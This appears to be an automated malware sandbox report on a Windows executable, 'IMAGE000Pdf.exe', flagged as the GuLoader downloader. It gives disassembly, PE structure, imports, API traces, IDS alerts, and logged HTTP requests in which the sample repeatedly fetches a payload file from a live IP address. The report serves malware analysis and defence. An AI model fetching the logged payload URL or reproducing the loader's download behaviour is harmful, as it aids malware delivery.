mov dword ptr [007A8A6Ch], eax
je 00007FA09CBBB853h
push ebx
call 00007FA09CBBEB41h
cmp eax, ebx
je 00007FA09CBBB849h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FA09CBBEABBh
push esi
call dword ptr [00408154h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FA09CBBB82Ch
push 0000000Bh
call 00007FA09CBBEB14h
push 00000009h
call 00007FA09CBBEB0Dh
push 00000007h
mov dword ptr [007A8A64h], eax
call 00007FA09CBBEB01h
cmp eax, ebx
je 00007FA09CBBB851h
push 0000001Eh
call eax
test eax, eax
je 00007FA09CBBB849h
or byte ptr [007A8A6Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408298h]
mov dword ptr [007A8B38h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FF08h
call dword ptr [0040818Ch]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3de000	0x56ef8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xdef90	0x920	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x656c	0x6600	12117ad2476c7a7912407af0dcfcb8a7	False	0.6737515318627451	data	6.47208759712619	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1398	0x1400	e3e8d62e1d2308b175349eb9daa266c8	False	0.4494140625	data	5.137750894959169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb78	0x600	2020ca26e010546720fd467c5d087b57	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x35000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3de000	0x56ef8	0x57000	c1896e67b80e50079ebeadcac8c0d8c3	False	0.13646338451867815	data	2.5203155069997596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3de2c8	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	English	United States	0.11415584223451786
RT_ICON	0x4202f0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.17530758310658937
RT_ICON	0x430b18	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.27551867219917014
RT_ICON	0x4330c0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.3295028142589118
RT_ICON	0x434168	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.47074468085106386
RT_DIALOG	0x4345d0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4346d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4347f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4348b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x434918	0x4c	data	English	United States	0.7894736842105263
RT_VERSION	0x434968	0x250	data	English	United States	0.5287162162162162
RT_MANIFEST	0x434bb8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-04T16:16:05.830050+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49980	173.249.193.48	80	TCP
2024-11-04T16:16:29.112597+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.9	49795	TCP
2024-11-04T16:17:06.917480+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.9	49973	TCP
2024-11-04T16:17:14.626933+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49972	173.249.193.48	80	TCP
2024-11-04T16:17:33.163894+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49974	173.249.193.48	80	TCP
2024-11-04T16:17:51.674002+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49975	173.249.193.48	80	TCP
2024-11-04T16:18:10.179042+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49976	173.249.193.48	80	TCP
2024-11-04T16:18:28.685872+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49977	173.249.193.48	80	TCP
2024-11-04T16:18:47.170399+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49978	173.249.193.48	80	TCP
2024-11-04T16:19:05.689254+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49979	173.249.193.48	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 16:17:05.710382938 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:05.715265036 CET	80	49972	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:05.715348005 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:05.715486050 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:05.720283985 CET	80	49972	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:14.626852036 CET	80	49972	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:14.626933098 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:14.627095938 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:14.628896952 CET	80	49972	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:14.628963947 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:14.629172087 CET	80	49972	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:14.629219055 CET	49972	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:14.632215023 CET	80	49972	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:24.648643017 CET	49974	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:24.653719902 CET	80	49974	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:24.653829098 CET	49974	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:24.655884981 CET	49974	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:24.660774946 CET	80	49974	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:33.163755894 CET	80	49974	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:33.163893938 CET	49974	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:33.163992882 CET	49974	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:33.168796062 CET	80	49974	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:43.175214052 CET	49975	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:43.180234909 CET	80	49975	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:43.180346012 CET	49975	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:43.180491924 CET	49975	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:43.185269117 CET	80	49975	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:51.673854113 CET	80	49975	173.249.193.48	192.168.2.9
Nov 4, 2024 16:17:51.674001932 CET	49975	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:51.674190998 CET	49975	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:17:51.679280043 CET	80	49975	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:01.692413092 CET	49976	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:01.697391987 CET	80	49976	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:01.697520018 CET	49976	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:01.697673082 CET	49976	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:01.702949047 CET	80	49976	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:10.178888083 CET	80	49976	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:10.179042101 CET	49976	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:10.183975935 CET	49976	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:10.188982010 CET	80	49976	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:20.192487955 CET	49977	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:20.197444916 CET	80	49977	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:20.197586060 CET	49977	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:20.197727919 CET	49977	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:20.202524900 CET	80	49977	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:28.685705900 CET	80	49977	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:28.685872078 CET	49977	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:28.686058044 CET	49977	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:28.691334009 CET	80	49977	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:38.691274881 CET	49978	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:38.696599007 CET	80	49978	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:38.696748018 CET	49978	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:38.696914911 CET	49978	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:38.702138901 CET	80	49978	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:47.170270920 CET	80	49978	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:47.170398951 CET	49978	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:47.170535088 CET	49978	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:47.175508022 CET	80	49978	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:57.180800915 CET	49979	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:57.185683966 CET	80	49979	173.249.193.48	192.168.2.9
Nov 4, 2024 16:18:57.185795069 CET	49979	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:57.186424017 CET	49979	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:18:57.191380024 CET	80	49979	173.249.193.48	192.168.2.9
Nov 4, 2024 16:19:05.689181089 CET	80	49979	173.249.193.48	192.168.2.9
Nov 4, 2024 16:19:05.689254045 CET	49979	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:19:05.689430952 CET	49979	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:19:05.694294930 CET	80	49979	173.249.193.48	192.168.2.9
Nov 4, 2024 16:19:15.707082033 CET	49980	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:19:15.712402105 CET	80	49980	173.249.193.48	192.168.2.9
Nov 4, 2024 16:19:15.712726116 CET	49980	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:19:15.713170052 CET	49980	80	192.168.2.9	173.249.193.48
Nov 4, 2024 16:19:15.718184948 CET	80	49980	173.249.193.48	192.168.2.9

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 4, 2024 16:16:08.547070980 CET	1.1.1.1	192.168.2.9	0xc4ce	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 16:16:08.547070980 CET	1.1.1.1	192.168.2.9	0xc4ce	No error (0)	dual.s-part-0017.t-0009.fb-t-msedge.net	s-part-0017.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 16:16:08.547070980 CET	1.1.1.1	192.168.2.9	0xc4ce	No error (0)	s-part-0017.t-0009.fb-t-msedge.net		13.107.253.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

173.249.193.48

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49972	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:17:05.715486050 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49974	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:17:24.655884981 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49975	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:17:43.180491924 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49976	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:18:01.697673082 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49977	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:18:20.197727919 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49978	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:18:38.696914911 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49979	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:18:57.186424017 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49980	173.249.193.48	80	7752	C:\Users\user\Desktop\IMAGE000Pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 16:19:15.713170052 CET	180	OUT	GET /VdpAwrpsFeHTHv196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: 173.249.193.48 Cache-Control: no-cache

Target ID:	0
Start time:	10:16:11
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\IMAGE000Pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMAGE000Pdf.exe"
Imagebase:	0x400000
File size:	915'632 bytes
MD5 hash:	53441F2DE2D573F3B2E4FB35C248229B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1804567210.00000000050D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:16:57
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\IMAGE000Pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMAGE000Pdf.exe"
Imagebase:	0x400000
File size:	915'632 bytes
MD5 hash:	53441F2DE2D573F3B2E4FB35C248229B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.3192256494.0000000002153000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	27%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.5%
Total number of Nodes:	704
Total number of Limit Nodes:	16

Executed Functions

Function 004034A2 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C5
GetVersion.KERNEL32 ref: 004034CB
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
OleInitialize.OLE32(00000000), ref: 00403542
SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
CharNextW.USER32(00000000,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000020,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB

Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B

Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB

OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
ExitProcess.KERNEL32 ref: 00403837
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
CopyFileW.KERNEL32(C:\Users\user\Desktop\IMAGE000Pdf.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
AdjustTokenPrivileges.ADVAPI32 ref: 00403995
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
ExitProcess.KERNEL32 ref: 004039DD

Strings

~nsu, xrefs: 00403842
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods, xrefs: 004036C8, 004037E8, 00403892, 0040389C
.tmp, xrefs: 0040385E
C:\Users\user\Desktop\IMAGE000Pdf.exe, xrefs: 004038F5
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms, xrefs: 004037F3
C:\Users\user\AppData\Local\Temp\, xrefs: 004036DA, 004036DF, 004036F5, 00403701, 00403710, 0040371D, 00403729, 00403731, 00403847, 00403858, 00403863, 0040386F, 0040387C, 0040388B, 0040393C
\Temp, xrefs: 004036FC
UXTHEME, xrefs: 004034F2, 004034F7, 004034FD
"C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00403579, 0040357F, 00403773
TMP, xrefs: 00403732
1033, xrefs: 00403746
C:\Users\user\Desktop, xrefs: 00403869, 0040386E, 0040389B
SeShutdownPrivilege, xrefs: 0040396C
Low, xrefs: 00403718
Error launching installer, xrefs: 004037CD
NSIS Error, xrefs: 00403564
TEMP, xrefs: 0040372A

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
